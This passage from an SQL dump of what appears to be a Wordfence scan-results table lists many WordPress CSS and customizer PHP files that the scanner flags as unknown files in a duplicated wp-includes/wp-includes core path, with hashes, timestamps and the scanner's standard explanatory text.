More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/css/jquery-ui-dialog-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33917,1631564685,1631564685,'new','knownfile',75,'f7187fca3d1a9ef150ffd79f16cfa919','35c88ea9ca93ca02a7605b3200971b02','Unknown file in WordPress core: wp-includes/wp-includes/css/jquery-ui-dialog.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/css/jquery-ui-dialog.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33918,1631564685,1631564685,'new','knownfile',75,'082c0444f3bf02c697ba9dde86d6482b','feba99d2a0739fc2726284725ad8cc02','Unknown file in WordPress core: wp-includes/wp-includes/css/jquery-ui-dialog.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/css/jquery-ui-dialog.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33919,1631564686,1631564686,'new','knownfile',75,'da555cfbd79026720ec3a94ffb307574','c68c27f236835c4d8fb269042e34a510','Unknown file in WordPress core: wp-includes/wp-includes/css/media-views-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/css/media-views-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33920,1631564686,1631564686,'new','knownfile',75,'23b98203bad9406ff34ee80a0797ab9c','ab2289198cfd394ab388519fc4627f78','Unknown file in WordPress core: wp-includes/wp-includes/css/media-views-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/css/media-views-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33921,1631564686,1631564686,'new','knownfile',75,'c2a46a16fbecf04dfa30132dbb995ab7','9c612d9b11ef14e9780555accb2639c4','Unknown file in WordPress core: wp-includes/wp-includes/css/media-views.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/css/media-views.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33922,1631564686,1631564686,'new','knownfile',75,'4fd31a2d6726d0ebb57ccaac2ce5093d','79b364ef4c7b8277b45b245e1b8e1a35','Unknown file in WordPress core: wp-includes/wp-includes/css/media-views.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/css/media-views.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33923,1631564686,1631564686,'new','knownfile',75,'9b56defa82dd1a0612202d500fb781d8','1b82ca4491a5a89270da550ed695dbc2','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-auth-check-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/css/wp-auth-check-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33924,1631564686,1631564686,'new','knownfile',75,'2c8649e68c28f59378e809d787caaafd','d2d685bf9a8cc5de3337330d2bba156a','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-auth-check-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/wp-auth-check-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33925,1631564686,1631564686,'new','knownfile',75,'ec4ac91840f41d7da23f95d9fb03f536','31e1c538bd22b276377925f880e775ac','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-auth-check.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/css/wp-auth-check.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33926,1631564686,1631564686,'new','knownfile',75,'ae911e169f4901d2b96280555dc27931','19a10223d581607328008aac0d85cafb','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-auth-check.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/css/wp-auth-check.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33927,1631564686,1631564686,'new','knownfile',75,'f83970a07f6149653fe75e9cd8144ed3','db3577868892545ca1332cef9cd1955e','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-embed-template-ie.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/css/wp-embed-template-ie.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33928,1631564686,1631564686,'new','knownfile',75,'d62494a3ecc5dc1797c103af7d21eb7e','e6d683438ca25b8a1be923487c188aec','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-embed-template-ie.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/css/wp-embed-template-ie.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33929,1631564686,1631564686,'new','knownfile',75,'e0c3a90083266e668997940e9e4a951c','39d8afcb947f1718b5dadc1a5bcef679','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-embed-template.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/css/wp-embed-template.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33930,1631564686,1631564686,'new','knownfile',75,'c946c101f926ed9926b375a90923b8fa','a24c90b335bf72d630d72b84b3b2fd75','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-embed-template.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/wp-embed-template.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33931,1631564686,1631564686,'new','knownfile',75,'f7486c2245c954608559a25b4ad44a40','a3948af57241c7073466ffc0f7f88da1','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-pointer-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/css/wp-pointer-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33932,1631564686,1631564686,'new','knownfile',75,'9ec062f7a8d2cd16103e04d94438a414','d1193707ae29aef7e7f3cd8618d146da','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-pointer-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/css/wp-pointer-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33933,1631564686,1631564686,'new','knownfile',75,'1f9d67a489fb3973bd6f946577fdd9ab','3e591ec3cb6771ca19cab5cbc883acb3','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-pointer.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/css/wp-pointer.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33934,1631564686,1631564686,'new','knownfile',75,'70a7cd994c416cf40ed863ec96db1d46','e3b055c37659793914880dd67719ed51','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-pointer.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/css/wp-pointer.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33935,1631564686,1631564686,'new','knownfile',75,'0baa74ba8018bcb6bacf24346034398a','8c0d473a2c02f4fe93b34fe5448cc352','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-background-image-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:81:\"wp-includes/wp-includes/customize/class-wp-customize-background-image-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33936,1631564686,1631564686,'new','knownfile',75,'0e9002feca4fcd39851a20bacf2b7d53','e2964a460bb4a7666f36381394759ba3','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-background-image-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:81:\"wp-includes/wp-includes/customize/class-wp-customize-background-image-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33937,1631564686,1631564686,'new','knownfile',75,'17fce30c3092739b8cd17082c3ae8eff','9a8027e662384e0694ed558d8c9725a0','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-background-position-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:84:\"wp-includes/wp-includes/customize/class-wp-customize-background-position-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33938,1631564686,1631564686,'new','knownfile',75,'200c11ffca2bd6ecac12554291e68ac6','f734d8b64334203a04b05f124644dfe0','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-code-editor-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:76:\"wp-includes/wp-includes/customize/class-wp-customize-code-editor-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33939,1631564686,1631564686,'new','knownfile',75,'1c058a105bd3e3b70e9fb39655621f52','e11c536d66badc3921e2ebaa6c3804cd','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-color-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/customize/class-wp-customize-color-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33940,1631564686,1631564686,'new','knownfile',75,'c2dfbd83f54fc21dddeb889b33d642fb','de9539813ab19346ffd86ade21ae31cf','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-cropped-image-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/customize/class-wp-customize-cropped-image-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33941,1631564686,1631564686,'new','knownfile',75,'16cc63395efd580c595a5e81aefb1283','617a20728ff325807f433f147d54c4e8','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-custom-css-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:75:\"wp-includes/wp-includes/customize/class-wp-customize-custom-css-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33942,1631564686,1631564686,'new','knownfile',75,'61a2ab1fc5449eea6264f581bdb0bcd6','9625b8ef659c2fa5d3c3a10a7813debc','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-date-time-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/customize/class-wp-customize-date-time-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33943,1631564686,1631564686,'new','knownfile',75,'e2e1ce854cc101c2bda016bc7efc1bd0','608fe7707e764fb0d045fa78e6eb35ac','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-filter-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/customize/class-wp-customize-filter-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33944,1631564686,1631564686,'new','knownfile',75,'dd2befdf77d2284d7b2526a60c757013','c6cdac312f5d7fb65321829d0a174869','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-header-image-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/customize/class-wp-customize-header-image-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33945,1631564686,1631564686,'new','knownfile',75,'c66e85a4f1a8da928646b6f23faf865a','0bd25cc07376ce7f23ef59b022205652','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-header-image-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/customize/class-wp-customize-header-image-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33946,1631564686,1631564686,'new','knownfile',75,'f28b1ad7753e45de9ecc509951e3e07b','24af6e7f98ab60e148ca3e1a1efdba49','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-image-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/customize/class-wp-customize-image-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33947,1631564686,1631564686,'new','knownfile',75,'1c856bb3c04c7a0ab24729104e357e73','2cd55236b515eb0d2d67d120016b83f0','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-media-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/customize/class-wp-customize-media-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33948,1631564686,1631564686,'new','knownfile',75,'e5f2591df261567283863166953e12bc','db8ae254a910f8e8018a5f18318331f4','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:82:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33949,1631564686,1631564686,'new','knownfile',75,'e3914da47907028622869ed7e37a2378','79bc3cffe7302d75a99ba3be6b3a4e71','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33950,1631564686,1631564686,'new','knownfile',75,'b27b6ed07c6c25c2331617e2141c4991','139c8773e435c98b2f22fec0dbdf9a69','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33951,1631564687,1631564687,'new','knownfile',75,'656f02f63ef60b96f355969c60fafc77','d51a45fcc23a1fa623c869387033077d','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33952,1631564687,1631564687,'new','knownfile',75,'27528309b2c7cd1ef1a3900f4f0d3b98','5762f4f954f8777edcb0c5cf9e92384c','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-location-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:82:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-location-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33953,1631564687,1631564687,'new','knownfile',75,'a79b2d67b9d9c4079f60344190a6ed1c','2a111821a3d0e8bda74819be5a5a1d21','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-locations-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:83:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-locations-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33954,1631564687,1631564687,'new','knownfile',75,'03e9cf5ef8c3d18840773af7e7b1f69e','12a5863706a030eb45edfaf2fa1371d1','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-name-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-name-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33955,1631564687,1631564687,'new','knownfile',75,'ea0fd5fe8342e8092f7304910ebe9780','8b5da127b56861b3b23256a4385b0fd4','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-section.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 